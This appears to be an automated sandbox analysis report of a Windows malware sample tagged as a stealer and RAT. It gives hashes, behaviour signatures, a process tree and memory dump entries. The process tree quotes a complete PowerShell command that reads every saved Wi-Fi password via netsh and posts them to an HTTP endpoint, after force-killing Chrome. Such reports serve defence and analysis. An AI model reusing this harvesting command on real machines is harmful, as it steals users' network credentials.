Analysis

  • max time kernel: 90s
  • max time network: 141s
  • platform: windows10-2004_x64
  • resource: win10v2004-20250217-en
  • resource tags: arch:x64, arch:x86, image:win10v2004-20250217-en, locale:en-us, os:windows10-2004-x64, system
  • submitted: 06/03/2025, 02:24

General

  • Target: 2025-03-06_9784274d90b1a971668186bd04ea4059_frostygoop_luca-stealer_poet-rat_sliver_snatch.exe
  • Size: 23.9MB
  • MD5: 9784274d90b1a971668186bd04ea4059
  • SHA1: 845f0e883e7b37c5531fe1e7f1f4f8e5fe3f50de
  • SHA256: dd663cb5b02e8b028bf81adf8e9ae6ae86494d7a283ba88ab6aec7845064c3d7
  • SHA512: 5b973091579b9e7d25f64bc802f79c597195ca61527259f79e76b92a1b7a20754a77520d9a697ccf55cbdcc9598deeab9a1e92513a3f6bd6d7d97788ab42f100
  • SSDEEP: 196608:6dfRWRKnCaV266bE5Ne/ZTqz3XOYjMjlQY:61Ca0Y5NtNA5Q

Malware Config

Signatures

  • Reads user/profile data of web browsers (3 TTPs)

    Infostealers often target stored browser data, which can include saved credentials and similar profile contents.

  • Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)

    Uses the powershell.exe command.

  • Event Triggered Execution: Netsh Helper DLL (1 TTP, 3 IoCs)

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery (1 TTP, 2 IoCs)

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Kills process with taskkill (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of WriteProcessMemory (6 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-06_9784274d90b1a971668186bd04ea4059_frostygoop_luca-stealer_poet-rat_sliver_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-06_9784274d90b1a971668186bd04ea4059_frostygoop_luca-stealer_poet-rat_sliver_snatch.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5072
    • C:\Windows\System32\taskkill.exe
      C:\Windows\System32\taskkill.exe /IM chrome.exe /F /T
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:4456
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command " $profiles = netsh wlan show profiles | Select-String \"All User Profile\" | ForEach-Object { $_.ToString().Split(\":\")[1].Trim() }; $wifiProfiles = @(); foreach ($profile in $profiles) { $profileDetails = netsh wlan show profile name=\"$profile\" key=clear; $passwordMatch = $profileDetails | Select-String \"Key Content\"; if ($passwordMatch) { $password = $passwordMatch.ToString().Split(\":\")[1].Trim(); } else { $password = \"No password found\"; } $wifiProfiles += [PSCustomObject]@{ SSID = $profile; Password = $password } }; $json = $wifiProfiles | ConvertTo-Json; try { Invoke-RestMethod -Uri \"http://localhost:9382/api/wifi\" -Method Post -Body $json -ContentType \"application/json\"; } catch { Write-Error \"Failed to send data: $_\" } "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Network Configuration Discovery: Wi-Fi Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5080
      • C:\Windows\system32\netsh.exe
        "C:\Windows\system32\netsh.exe" wlan show profiles
        3⤵
        • Event Triggered Execution: Netsh Helper DLL
        • System Network Configuration Discovery: Wi-Fi Discovery
        PID:1660

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ed1amux.w3r.ps1

    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/5080-0-0x00007FFE26733000-0x00007FFE26735000-memory.dmp
    Filesize: 8KB

  • memory/5080-1-0x000001698CC10000-0x000001698CC32000-memory.dmp
    Filesize: 136KB

  • memory/5080-11-0x00007FFE26730000-0x00007FFE271F1000-memory.dmp
    Filesize: 10.8MB

  • memory/5080-12-0x00007FFE26730000-0x00007FFE271F1000-memory.dmp
    Filesize: 10.8MB

  • memory/5080-13-0x00000169A7660000-0x00000169A7822000-memory.dmp
    Filesize: 1.8MB

  • memory/5080-16-0x00007FFE26730000-0x00007FFE271F1000-memory.dmp
    Filesize: 10.8MB